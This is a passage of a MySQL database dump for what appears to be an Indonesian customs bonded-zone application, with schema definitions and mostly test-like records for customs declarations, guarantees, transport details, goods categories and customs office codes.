'1.00', '2.00', null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('3', '201.20', '', null, 'SSCP', null, null, null, '', '1', '2012-07-25', null); INSERT INTO hdrjaminan VALUES ('3', '201207', '', null, 'BM', '1.00', '2.00', null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('3', '201207', '', null, 'BungaPPNPPnBM', '1.00', '2.00', null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('3', '201207', '', null, 'Cukai', '1.00', '2.00', null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('3', '201207', '', null, 'DBBMCukai', '1.00', '2.00', null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('3', '201207', '', null, 'NTB', null, null, null, 'SSCP', '2', '2012-07-17', null); INSERT INTO hdrjaminan VALUES ('3', '201207', '', null, 'NTB', null, null, null, 'SSP', '1', '2012-07-24', null); INSERT INTO hdrjaminan VALUES ('3', '201207', '', null, 'PNBP', '1.00', '2.00', null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('3', '201207', '', null, 'PPh', '1.00', '2.00', null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('3', '201207', '', null, 'PPN', '1.00', '2.00', null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('3', '201207', '', null, 'PPnBM', '1.00', '2.00', null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('3', '201207', '', null, 'SSCP', null, null, null, '', '1', '2012-07-25', null); INSERT INTO hdrjaminan VALUES ('4', '000001', '1', '2012-07-31', '2', '2.00', null, '2012-07-30', '', '2', '2012-07-31', '1'); INSERT INTO hdrjaminan VALUES ('4', '000001', '', null, 'BM', '1.00', null, null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('4', '000001', '', null, 'Cukai', '2.00', null, null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('4', '000001', '', null, 'PPh', '1.00', null, null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('4', '000001', '', null, 'PPN', '1.00', null, null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('4', '000001', '', null, 'PPnBM', '2.00', null, null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('4', '000002', '', '0000-00-00', '', '0.00', null, '0000-00-00', '', '', '0000-00-00', ''); INSERT INTO hdrjaminan VALUES ('4', '000002', '', null, 'BM', '0.00', null, null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('4', '000002', '', null, 'Cukai', '0.00', null, null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('4', '000002', '', null, 'PPh', '0.00', null, null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('4', '000002', '', null, 'PPN', '0.00', null, null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('4', '000002', '', null, 'PPnBM', '0.00', null, null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('5', '000001', '1', '2012-07-31', '2', '2.00', null, '2012-07-30', '', '2', '2012-07-31', '1'); INSERT INTO hdrjaminan VALUES ('5', '000001', '', null, 'BM', '2.00', null, null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('5', '000001', '', null, 'Cukai', '1.00', null, null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('5', '000001', '', null, 'PPh', '2.00', null, null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('5', '000001', '', null, 'PPN', '2.00', null, null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('5', '000001', '', null, 'PPnBM', '1.00', null, null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('5', '000002', '', '0000-00-00', '', '0.00', null, '0000-00-00', '', '', '0000-00-00', ''); INSERT INTO hdrjaminan VALUES ('5', '000002', '', null, 'BM', '0.00', null, null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('5', '000002', '', null, 'Cukai', '0.00', null, null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('5', '000002', '', null, 'PPh', '0.00', null, null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('5', '000002', '', null, 'PPN', '0.00', null, null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('5', '000002', '', null, 'PPnBM', '0.00', null, null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('7', '000001', '', null, 'BK', '2.00', null, null, 'NTB', '1', '2012-07-27', null); INSERT INTO hdrjaminan VALUES ('7', '000001', '', null, 'PNBP', '1.00', null, null, 'NTPN', '2', '2012-07-11', null); INSERT INTO hdrjaminan VALUES ('7', '000001', '', null, 'SSPCP', null, null, null, '', '1.00', '2012-07-22', null); INSERT INTO hdrjaminan VALUES ('7', '000002', '', null, 'BK', '0.00', null, null, 'NTPN', '', '0000-00-00', null); INSERT INTO hdrjaminan VALUES ('7', '000002', '', null, 'PNBP', '0.00', null, null, 'NTPN', '', '0000-00-00', null); INSERT INTO hdrjaminan VALUES ('7', '000002', '', null, 'SSPCP', null, null, null, '', '', '2012-10-31', null); INSERT INTO hdrjaminan VALUES ('8', '000001', '', null, 'BM', '0.00', '0.00', null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('8', '000001', '', null, 'BungaPPNPPnBM', '0.00', '0.00', null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('8', '000001', '', null, 'Cukai', '0.00', '0.00', null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('8', '000001', '', null, 'DBBMCukai', '0.00', '0.00', null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('8', '000001', '', null, 'NTPN', null, null, null, 'SSCP', '', '0000-00-00', null); INSERT INTO hdrjaminan VALUES ('8', '000001', '', null, 'NTPN', null, null, null, 'SSP', '', '0000-00-00', null); INSERT INTO hdrjaminan VALUES ('8', '000001', '', null, 'PNBP', '0.00', '0.00', null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('8', '000001', '', null, 'PPh', '0.00', '0.00', null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('8', '000001', '', null, 'PPN', '0.00', '0.00', null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('8', '000001', '', null, 'PPnBM', '0.00', '0.00', null, '', null, null, null); INSERT INTO hdrjaminan VALUES ('8', '000001', '', null, 'SSCP', null, null, null, '', '', '0000-00-00', null); INSERT INTO hdrjaminan VALUES ('8', '000001', '', null, 'SSP', null, null, null, '', '', '0000-00-00', null); -- ---------------------------- -- Table structure for `hdrpelabuhan` -- ---------------------------- DROP TABLE IF EXISTS `hdrpelabuhan`; CREATE TABLE `hdrpelabuhan` ( `DokKdBc` tinyint(1) NOT NULL DEFAULT '0', `CAR` varchar(6) NOT NULL DEFAULT '', `MuatAsal` varchar(5) DEFAULT NULL, `MuatEkspor` varchar(5) DEFAULT NULL, `Transit` varchar(5) DEFAULT NULL, `Bongkar` varchar(5) DEFAULT NULL, PRIMARY KEY (`DokKdBc`,`CAR`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of hdrpelabuhan -- ---------------------------- INSERT INTO hdrpelabuhan VALUES ('1', '000700', 'KRPUS', '', '', 'IDTPP'); INSERT INTO hdrpelabuhan VALUES ('1', '000701', '', '', '', 'IDTPP'); INSERT INTO hdrpelabuhan VALUES ('7', '000001', 'IDTPP', 'IDTPP', '', 'USFAT'); INSERT INTO hdrpelabuhan VALUES ('7', '000002', 'IDTPP', 'IDTPP', '', ''); -- ---------------------------- -- Table structure for `hdrpengangkutan` -- ---------------------------- DROP TABLE IF EXISTS `hdrpengangkutan`; CREATE TABLE `hdrpengangkutan` ( `DokKdBc` tinyint(1) NOT NULL DEFAULT '0', `CAR` varchar(6) NOT NULL DEFAULT '', `CaraAngkut` tinyint(1) DEFAULT NULL, `JnsAngkut` varchar(30) DEFAULT NULL COMMENT 'Jenis Sarana Pengangkut Darat', `NmAngkut` varchar(40) DEFAULT NULL, `NoPolisi` varchar(15) DEFAULT NULL, `KdNegara` varchar(3) DEFAULT NULL, `TgKiraEkspor` date DEFAULT NULL, PRIMARY KEY (`DokKdBc`,`CAR`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of hdrpengangkutan -- ---------------------------- INSERT INTO hdrpengangkutan VALUES ('0', '', null, '', null, '', null, null); INSERT INTO hdrpengangkutan VALUES ('1', '000701', '0', null, '', '', null, null); INSERT INTO hdrpengangkutan VALUES ('3', '201207', '0', '', '', '', null, null); INSERT INTO hdrpengangkutan VALUES ('4', '000001', null, '1', null, '2', null, null); INSERT INTO hdrpengangkutan VALUES ('4', '000002', null, '', null, '', null, null); INSERT INTO hdrpengangkutan VALUES ('5', '000001', null, '2', null, '1', null, null); INSERT INTO hdrpengangkutan VALUES ('5', '000002', null, '', null, '', null, null); INSERT INTO hdrpengangkutan VALUES ('6', '000.00', null, '2', null, '1', null, null); INSERT INTO hdrpengangkutan VALUES ('6', '000.11', null, '2', null, '1', null, null); INSERT INTO hdrpengangkutan VALUES ('6', '000001', null, '2', null, '1', null, null); INSERT INTO hdrpengangkutan VALUES ('6', '000002', null, '', null, '', null, null); INSERT INTO hdrpengangkutan VALUES ('7', '000001', '1', null, '', '189', 'US', '0000-00-00'); INSERT INTO hdrpengangkutan VALUES ('7', '000002', '0', null, '', '', '', '0000-00-00'); INSERT INTO hdrpengangkutan VALUES ('8', '000001', null, '2', null, '1', null, null); INSERT INTO hdrpengangkutan VALUES ('8', '000002', null, 'Truk', null, 'B201', null, null); INSERT INTO hdrpengangkutan VALUES ('8', '000003', null, '', null, '', null, null); INSERT INTO hdrpengangkutan VALUES ('9', '000001', null, '2', null, '1', null, null); INSERT INTO hdrpengangkutan VALUES ('9', '000002', null, '', null, '', null, null); -- ---------------------------- -- Table structure for `hdrperdagangan` -- ---------------------------- DROP TABLE IF EXISTS `hdrperdagangan`; CREATE TABLE `hdrperdagangan` ( `DokKdBc` tinyint(1) NOT NULL DEFAULT '0', `CAR` varchar(6) NOT NULL DEFAULT '', `KdDaerah` varchar(4) DEFAULT NULL, `KdNegaraEkspor` varchar(2) DEFAULT NULL, `KdCrSerahBrg` varchar(3) DEFAULT NULL, PRIMARY KEY (`DokKdBc`,`CAR`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of hdrperdagangan -- ---------------------------- INSERT INTO hdrperdagangan VALUES ('7', '000001', '3200', 'US', 'FOB'); INSERT INTO hdrperdagangan VALUES ('7', '000002', '', '', ''); -- ---------------------------- -- Table structure for `hdrpetikemas` -- ---------------------------- DROP TABLE IF EXISTS `hdrpetikemas`; CREATE TABLE `hdrpetikemas` ( `DokKdBc` tinyint(1) NOT NULL DEFAULT '0', `CAR` varchar(6) NOT NULL DEFAULT '', `NoUrut` tinyint(2) NOT NULL DEFAULT '0', `Merk` varchar(15) DEFAULT NULL, `Nomor` varchar(10) DEFAULT NULL, `Ukuran` varchar(10) DEFAULT NULL, `Tipe` varchar(15) DEFAULT NULL, PRIMARY KEY (`DokKdBc`,`CAR`,`NoUrut`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of hdrpetikemas -- ---------------------------- INSERT INTO hdrpetikemas VALUES ('1', '000700', '1', 'FCLU', '2037740', '20 Feet', 'FCL'); INSERT INTO hdrpetikemas VALUES ('7', '000001', '1', 'fcl', '88', '89', '1'); -- ---------------------------- -- Table structure for `hdrtransaksi` -- ---------------------------- DROP TABLE IF EXISTS `hdrtransaksi`; CREATE TABLE `hdrtransaksi` ( `DokKdBc` tinyint(1) NOT NULL DEFAULT '0', `CAR` varchar(6) NOT NULL DEFAULT '', `KdVal` varchar(3) DEFAULT NULL, `NDPBM` decimal(12,2) DEFAULT '1.00', `Freight` decimal(12,2) DEFAULT NULL, `AsLNDN` decimal(12,2) DEFAULT NULL, `FOB` decimal(12,2) DEFAULT NULL, `CIF` decimal(12,2) DEFAULT NULL, `CIFUSD` decimal(12,2) NOT NULL, `HrgSerah` decimal(12,2) DEFAULT NULL, PRIMARY KEY (`DokKdBc`,`CAR`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of hdrtransaksi -- ---------------------------- INSERT INTO hdrtransaksi VALUES ('0', '', '', '1.00', null, null, null, '0.00', '0.00', null); INSERT INTO hdrtransaksi VALUES ('1', '000700', 'USD', '9203.00', '0.00', '0.00', '0.00', '128002686.00', '0.00', '0.00'); INSERT INTO hdrtransaksi VALUES ('1', '000701', 'USD', '0.00', '0.00', '0.00', '0.00', '0.00', '0.00', '0.00'); INSERT INTO hdrtransaksi VALUES ('3', '000001', 'USD', '9409.00', '0.00', '0.00', '0.00', '19149197.00', '0.00', '293512254.00'); INSERT INTO hdrtransaksi VALUES ('3', '000002', 'USD', '0.00', '0.00', '0.00', '0.00', '0.00', '0.00', '0.00'); INSERT INTO hdrtransaksi VALUES ('3', '201..2', 'USD', '2.00', '0.00', '0.00', '0.00', '1.00', '0.00', '1.00'); INSERT INTO hdrtransaksi VALUES ('3', '201.20', 'USD', '2.00', '0.00', '0.00', '0.00', '1.00', '0.00', '1.00'); INSERT INTO hdrtransaksi VALUES ('3', '201207', 'USD', '2.00', '0.00', '0.00', '0.00', '1.00', '0.00', '1.00'); INSERT INTO hdrtransaksi VALUES ('4', '000001', 'USD', '2.00', null, null, null, '2.00', '0.00', null); INSERT INTO hdrtransaksi VALUES ('4', '000002', 'USD', '0.00', null, null, null, '0.00', '0.00', null); INSERT INTO hdrtransaksi VALUES ('5', '000001', 'USD', '1.00', null, null, null, '2.00', '0.00', null); INSERT INTO hdrtransaksi VALUES ('5', '000002', 'USD', '1.00', null, null, null, '0.00', '0.00', null); INSERT INTO hdrtransaksi VALUES ('6', '000.00', 'USD', '0.00', null, null, null, '0.00', '0.00', '0.00'); INSERT INTO hdrtransaksi VALUES ('6', '000.11', 'USD', '0.00', null, null, null, '2.00', '0.00', '0.00'); INSERT INTO hdrtransaksi VALUES ('6', '000001', 'USD', '0.00', null, null, null, '2.00', '0.00', '1.00'); INSERT INTO hdrtransaksi VALUES ('6', '000002', 'USD', '0.00', null, null, null, '0.00', '0.00', '0.00'); INSERT INTO hdrtransaksi VALUES ('7', '000001', 'USD', '0.00', '0.00', '0.00', '684.00', '0.00', '0.00', '0.00'); INSERT INTO hdrtransaksi VALUES ('7', '000002', 'USD', '0.00', '0.00', '0.00', '0.00', '0.00', '0.00', '0.00'); INSERT INTO hdrtransaksi VALUES ('8', '000001', 'Rp', '1.00', null, null, null, null, '0.00', '2.00'); INSERT INTO hdrtransaksi VALUES ('8', '000002', 'Rp', '1.00', null, null, null, null, '0.00', '300.00'); INSERT INTO hdrtransaksi VALUES ('8', '000003', 'Rp', '1.00', null, null, null, null, '0.00', '0.00'); INSERT INTO hdrtransaksi VALUES ('9', '000001', 'Rp', '1.00', null, null, null, null, '0.00', '2.00'); INSERT INTO hdrtransaksi VALUES ('9', '000002', 'Rp', '1.00', null, null, null, null, '0.00', '0.00'); -- ---------------------------- -- Table structure for `header` -- ---------------------------- DROP TABLE IF EXISTS `header`; CREATE TABLE `header` ( `DokKdBc` tinyint(1) NOT NULL DEFAULT '0' COMMENT 'Kode Dokumen BC', `CAR` varchar(6) NOT NULL DEFAULT '' COMMENT 'Nomor Pengajuan', `NoDaf` varchar(8) NOT NULL DEFAULT '' COMMENT 'Nomor Pendaftaran', `TgDaf` date DEFAULT NULL COMMENT 'Tanggal Pendaftaran', `KdTp` tinyint(1) DEFAULT NULL COMMENT 'Npwp Perusahaan Asal', `KdKpbcAsal` varchar(6) DEFAULT NULL COMMENT 'Kantor Pabean Asal', `KdJnsEkspor` varchar(15) DEFAULT NULL, `KdKatEkspor` varchar(20) DEFAULT NULL, `KdKpbcTuj` varchar(6) DEFAULT NULL COMMENT 'Kantor Pabean Tujuan', `KdJnsBarang` int(2) DEFAULT NULL, `KdCrDagang` varchar(15) DEFAULT NULL, `KdCrBayar` varchar(15) DEFAULT NULL, `KdKpBongkar` varchar(6) DEFAULT NULL, `KdKpPengawas` varchar(6) DEFAULT NULL, `KdJnsTpbAsal` tinyint(1) DEFAULT NULL COMMENT 'Kode Jenis TPB Asal', `KdJnsTpbTuj` tinyint(1) DEFAULT NULL COMMENT 'Kode Jenis TPB Tujuan', `JnsBc25` enum('2','1') DEFAULT NULL, `KondisiBrg` enum('2','1') DEFAULT NULL, `NmPpjk` varchar(20) DEFAULT NULL, `NmTuj` varchar(50) DEFAULT NULL, `KdTimbun` varchar(5) DEFAULT NULL, `KdLokPeriksa` varchar(5) DEFAULT NULL, `KdKpPeriksa` varchar(6) DEFAULT NULL, `KdDaerahAsalBrg` varchar(6) DEFAULT NULL, `NoSegel` varchar(6) DEFAULT NULL, `JnsSegel` varchar(15) DEFAULT NULL, `CatBcTuj` varchar(250) DEFAULT NULL COMMENT 'Catatan BC Tujuan', `MerekKemas` varchar(50) DEFAULT NULL, `KdKemas` varchar(3) DEFAULT NULL, `JmlKemas` int(12) DEFAULT NULL, `VOL` decimal(12,4) DEFAULT NULL, `BRUTO` decimal(12,2) DEFAULT NULL, `NETTO` decimal(12,2) DEFAULT NULL, `Total` decimal(12,2) DEFAULT NULL, `TotalH` decimal(12,2) DEFAULT NULL, `NilaiBkRp` decimal(12,2) DEFAULT NULL, `NmPengusaha` varchar(30) DEFAULT NULL, `NipPengusaha` varchar(20) DEFAULT NULL, `NmPejabat` varchar(30) DEFAULT NULL, `NipPejabat` varchar(20) DEFAULT NULL, `ref_id` int(10) DEFAULT NULL, PRIMARY KEY (`DokKdBc`,`CAR`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of header -- ---------------------------- INSERT INTO header VALUES ('0', '', '', '0000-00-00', '0', '', null, null, null, null, null, null, null, null, '0', null, null, null, null, '', null, null, null, null, null, null, null, '', '', '0', '0.0000', '0.00', '0.00', '0.00', null, null, '', '', '', '', '0'); INSERT INTO header VALUES ('1', '000700', '000700', '2012-05-07', '2', '050800', null, null, null, '2', null, null, '040300', '050800', '1', null, null, null, '', 'HANSOLL TEXTILE LTD.', 'UTPK', null, null, null, null, null, null, 'FCLU', 'CT', '101', null, '9999999999.99', '9999999999.99', null, null, null, 'LEE JONG HYUK', 'a', 'kikin', 'b1', null); INSERT INTO header VALUES ('1', '000701', '000701', '2012-10-31', '0', '050800', null, null, null, '0', null, null, '050800', '050800', '0', null, null, null, '', 'PT. DIHEN BERSAMA', '', null, null, null, null, null, null, '', '', '0', null, '0.00', '0.00', '0.00', '0.00', null, 'Mr. Y. Tobusawa', '_', '', '', '2'); INSERT INTO header VALUES ('3', '000001', '000001', '2012-07-28', '0', '050800', null, null, '', null, null, null, null, null, '1', '0', '1', '2', null, 'THE GAP INC.,', null, null, null, null, '', '', '', '2', 'AE', '1', '2.0000', '1.00', '2.00', '1.00', '2.00', null, 'LEE JONG HYUK', '_', '1', '2', null); INSERT INTO header VALUES ('3', '000002', '000002', '2012-10-31', '0', '050800', null, null, '', null, null, null, null, null, '2', '0', '1', '1', null, '', null, null, null, null, '', '', '', '', '', '0', '0.0000', '0.00', '0.00', '0.00', '0.00', null, 'Mr. Y. Tobusawa', '_', '', '', '7'); INSERT INTO header VALUES ('4', '000001', '000001', '2012-07-31', '2', '050800', null, null, null, null, null, null, null, null, '1', null, null, null, null, 'PT. DK INTERNATIONAL', null, null, null, null, null, null, null, '1', 'AE', '2', '1.0000', '2.00', '1.00', '7.00', null, null, 'LEE JONG HYUK', '_', '1', '2', null); INSERT INTO header VALUES ('4', '000002', '000002', '2012-10-30', '2', '050800', null, null, null, null, null, null, null, null, '0', null, null, null, null, 'PARAMOUNT BED', null, null, null, null, null, null, null, '', '', '0', '0.0000', '0.00', '0.00', '0.00', null, null, 'Mr. Y. Tobusawa', '_', '', '', '7'); INSERT INTO header VALUES ('5', '000001', '000001', '2012-07-31', '6', '050800', null, null, null, null, null, null, null, null, '1', null, null, null, null, 'HANSOLL TEXTILE LTD.', null, null, null, null, null, null, null, '2', 'AE', '1', '2.0000', '1.00', '2.00', '8.00', null, null, 'LEE JONG HYUK', '_', '2', '1', null); INSERT INTO header VALUES ('5', '000002', '000002', '2012-10-30', '6', '050800', null, null, null, null, null, null, null, null, '0', null, null, null, null, 'PT. ALUMINDO LIGHT METAL INDUSTRY', null, null, null, null, null, null, null, '', '', '0', '0.0000', '0.00', '0.00', '0.00', null, null, 'Mr. Y. Tobusawa', '_', '', '', '1'); INSERT INTO header VALUES ('6', '000001', '000001', '1899-11-30', '1', '050800', null, null, '000000', null, null, null, null, null, '1', '2', null, null, null, 'PT. HANDSOME', null, null, null, null, '123456', 'Kertas', '2', '1', 'AE', '2', '1.0000', '2.00', '1.00', null, null, null, 'LEE JONG HYUK', '_', '2', '1', null); INSERT INTO header VALUES ('6', '000002', '000002', '2012-10-31', '3', '050800', null, null, '000000', null, null, null, null, null, '1', '1', null, null, null, '', null, null, null, null, '', 'Kertas', '', '', '', '0', '0.0000', '0.00', '0.00', null, null, null, 'Mr. Y. Tobusawa', '_', '', '', '7'); INSERT INTO header VALUES ('7', '000001', '000001', '2012-07-22', null, '040300', '1', '12', null, null, '2', '9', null, '', null, null, null, null, '', 'THE GAP INC.,', null, '1', '050800', null, null, null, null, '', '', '0', '0.0000', '0.00', '0.00', null, null, null, 'LEE JONG HYUK', '_', '', '', null); INSERT INTO header VALUES ('7', '000002', '000002', '2012-10-31', null, '040300', '1', '1', null, null, '1', '1', null, '', null, null, null, null, '', 'DENON', null, '', '', null, null, null, null, '', '', '0', '0.0000', '0.00', '0.00', null, null, null, 'Mr. Y. Tobusawa', '_', '', '', '2'); INSERT INTO header VALUES ('8', '000001', '000001', '2012-08-01', '2', '050800', null, null, '', null, null, null, null, null, '1', '0', '', '', null, 'PT. LUCAS ABADI', null, null, null, null, '', '', '', '1', 'AP', '2', '2.0000', '1.00', '2.00', '0.00', '0.00', null, 'LEE JONG HYUK', '_', '1', '2', null); INSERT INTO header VALUES ('8', '000002', '000002', '2012-10-29', '1', '050800', null, null, null, null, null, null, null, null, '1', null, null, null, null, 'PT. DIHEN BERSAMA', null, null, null, null, null, null, null, 'Tes', 'AM', '4', '0.0000', '310.00', '300.00', null, null, null, 'Mr. Y. Tobusawa', '_', 'Dani', '111', '2'); INSERT INTO header VALUES ('8', '000003', '000003', '2012-11-26', '0', '050800', null, null, null, null, null, null, null, null, '0', null, null, null, null, 'PT. DIHEN BERSAMA', null, null, null, null, null, null, null, '', '', '0', '0.0000', '0.00', '0.00', null, null, null, 'Mr. Y. Tobusawa', '_', '', '', '2'); INSERT INTO header VALUES ('9', '000001', '000001', '2012-08-02', '1', '050800', null, null, null, null, null, null, null, null, '2', null, null, null, null, 'PT. KAILO SUMBER KAS', null, null, null, null, null, null, null, '1', 'BB', '2', '1.0000', '2.00', '1.00', null, null, null, 'LEE JONG HYUK', '_', '1', '2', null); INSERT INTO header VALUES ('9', '000002', '000002', '2012-10-30', '5', '050800', null, null, null, null, null, null, null, null, '1', null, null, null, null, 'HITACHI', null, null, null, null, null, null, null, '', '', '0', '0.0000', '0.00', '0.00', null, null, null, 'Mr. Y. Tobusawa', '_', '', '', '7'); -- ---------------------------- -- Table structure for `jenis_barang` -- ---------------------------- DROP TABLE IF EXISTS `jenis_barang`; CREATE TABLE `jenis_barang` ( `KdJnsBarang` tinyint(2) NOT NULL DEFAULT '0', `UrJnsBarang` varchar(30) DEFAULT NULL, PRIMARY KEY (`KdJnsBarang`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of jenis_barang -- ---------------------------- INSERT INTO jenis_barang VALUES ('0', 'Barang Jadi'); INSERT INTO jenis_barang VALUES ('1', 'Bahan Baku'); INSERT INTO jenis_barang VALUES ('2', 'Bahan Penolong'); INSERT INTO jenis_barang VALUES ('3', 'Mesin/Sparepart'); INSERT INTO jenis_barang VALUES ('4', 'Peralatan Pabrik'); INSERT INTO jenis_barang VALUES ('5', 'Peralatan Perkantoran'); INSERT INTO jenis_barang VALUES ('6', 'Peralatan Kontruksi'); INSERT INTO jenis_barang VALUES ('7', 'Brg Reimpor TPB'); INSERT INTO jenis_barang VALUES ('8', 'Barang Contoh/Tes'); INSERT INTO jenis_barang VALUES ('9', 'Lainnya'); INSERT INTO jenis_barang VALUES ('10', 'Lebih dr 1 Jenis Brg (1 s/d 6)'); INSERT INTO jenis_barang VALUES ('11', 'WIP'); -- ---------------------------- -- Table structure for `jenis_dok` -- ---------------------------- DROP TABLE IF EXISTS `jenis_dok`; CREATE TABLE `jenis_dok` ( `KdJnsDok` tinyint(1) NOT NULL DEFAULT '0' COMMENT 'Kode TPB', `UrJnsDok` varchar(30) DEFAULT NULL COMMENT 'Uraian TPB', PRIMARY KEY (`KdJnsDok`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of jenis_dok -- ---------------------------- INSERT INTO jenis_dok VALUES ('1', 'BC 2.3'); INSERT INTO jenis_dok VALUES ('2', 'BC 2.4'); INSERT INTO jenis_dok VALUES ('3', 'BC 2.5'); INSERT INTO jenis_dok VALUES ('4', 'BC 2.6.1'); INSERT INTO jenis_dok VALUES ('5', 'BC 2.6.2'); INSERT INTO jenis_dok VALUES ('6', 'BC 2.7'); INSERT INTO jenis_dok VALUES ('7', 'BC 3.0'); INSERT INTO jenis_dok VALUES ('8', 'BC 4.0'); INSERT INTO jenis_dok VALUES ('9', 'BC 4.1'); -- ---------------------------- -- Table structure for `jenis_tpb` -- ---------------------------- DROP TABLE IF EXISTS `jenis_tpb`; CREATE TABLE `jenis_tpb` ( `KdJnsTpb` tinyint(1) NOT NULL DEFAULT '0' COMMENT 'Kode Jenis TPB', `UrJnsTpb` varchar(50) DEFAULT NULL COMMENT 'Uraian Jenis TPB', PRIMARY KEY (`KdJnsTpb`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of jenis_tpb -- ---------------------------- INSERT INTO jenis_tpb VALUES ('1', 'Kawasan Berikat'); INSERT INTO jenis_tpb VALUES ('2', 'Gudang Berikat'); INSERT INTO jenis_tpb VALUES ('3', 'Tempat Penyelenggara Pameran Berikat'); INSERT INTO jenis_tpb VALUES ('4', 'Toko Bebas Bea'); INSERT INTO jenis_tpb VALUES ('5', 'Tempat Lelang Berikat'); INSERT INTO jenis_tpb VALUES ('6', 'Kawasan Daur Ulang Berikat'); -- ---------------------------- -- Table structure for `kantor` -- ---------------------------- DROP TABLE IF EXISTS `kantor`; CREATE TABLE `kantor` ( `KdKpbc` varchar(6) NOT NULL DEFAULT '0', `UrKdKpbc` varchar(60) DEFAULT NULL, `Kota` varchar(25) DEFAULT NULL, PRIMARY KEY (`KdKpbc`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; -- ---------------------------- -- Records of kantor -- ---------------------------- INSERT INTO kantor VALUES ('000000', 'KANTOR PUSAT', 'JAKARTA'); INSERT INTO kantor VALUES ('010000', 'KANTOR WILAYAH I MEDAN', 'MEDAN'); INSERT INTO kantor VALUES ('010201', 'BALAI PENGUJIAN DAN IDENTIFIKASI BARANG MEDAN', ''); INSERT INTO kantor VALUES ('010700', 'KANTOR PELAYANAN BELAWAN', 'BELAWAN'); INSERT INTO kantor VALUES ('010731', 'POS PERCUT', ''); INSERT INTO kantor VALUES ('010732', 'POS PANTAI CERMIN', ''); INSERT INTO kantor VALUES ('010733', 'POS PANTAI LABU', ''); INSERT INTO kantor VALUES ('010734', 'POS LUBUK PAKAM', ''); INSERT INTO kantor VALUES ('010735', 'POS BINJAI', ''); INSERT INTO kantor VALUES ('010736', 'POS UJUNG BARU', ''); INSERT INTO kantor VALUES ('010737', 'POS GUDANG MERAH', ''); INSERT INTO kantor VALUES ('010738', 'POS GABION', ''); INSERT INTO kantor VALUES ('010739', 'POS RANTAU PANJANG', ''); INSERT INTO kantor VALUES ('010800', 'KANTOR PELAYANAN MEDAN', 'MEDAN'); INSERT INTO kantor VALUES ('010838', 'POS BANDARA I', ''); INSERT INTO kantor VALUES ('010839', 'POS BANDARA II', ''); INSERT INTO kantor VALUES ('010840', 'POS BANDARA III', ''); INSERT INTO kantor VALUES ('010900', 'KANTOR PELAYANAN PANGKALAN SUSU', 'PANGKALAN SUSU'); INSERT INTO kantor VALUES ('010911', 'KANTOR BANTU PANGKALAN BRANDAN', 'PANGKALAN BRANDAN'); INSERT INTO kantor VALUES ('010931', 'POS TANJUNG PURA', ''); INSERT INTO kantor VALUES ('010933', 'POS PANGKALAN SUSU', ''); INSERT INTO kantor VALUES ('011000', 'KANTOR PELAYANAN PEMATANG SIANTAR', 'PEMATANG SIANTAR'); INSERT INTO kantor VALUES ('011031', 'POS PORSEA', ''); INSERT INTO kantor VALUES ('011032', 'POS KABANJAHE', ''); INSERT INTO kantor VALUES ('011033', 'POS SIDIKALANG', ''); INSERT INTO kantor VALUES ('011100', 'KANTOR PELAYANAN TELUK NIBUNG', 'TELUK NIBUNG'); INSERT INTO kantor VALUES ('011131', 'POS TANJUNG TIRAM', ''); INSERT INTO kantor VALUES ('011134', 'POS LEIDONG', ''); INSERT INTO kantor VALUES ('011135', 'POS LABUHAN BILIK', ''); INSERT INTO kantor VALUES ('011137', 'POS RANTAU PRAPAT', ''); INSERT INTO kantor VALUES ('011138', 'POS TELUK NIBUNG', ''); INSERT INTO kantor VALUES ('011200', 'KANTOR PELAYANAN KUALA TANJUNG', 'KUALA TANJUNG'); INSERT INTO kantor VALUES ('011211', 'KANTOR BANTU TEBING TINGGI', 'TEBING TINGGI'); INSERT INTO kantor VALUES ('011231', 'POS BANDAR KHALIPAH', ''); INSERT INTO kantor VALUES ('011232', 'POS TELUK MENGKUDU', ''); INSERT INTO kantor VALUES ('011233', 'POS TANJUNG BERINGIN', ''); INSERT INTO kantor VALUES ('011234', 'POS PANGKALAN DODEK', ''); INSERT INTO kantor VALUES ('011235', 'POS KUALA TANJUNG', ''); INSERT 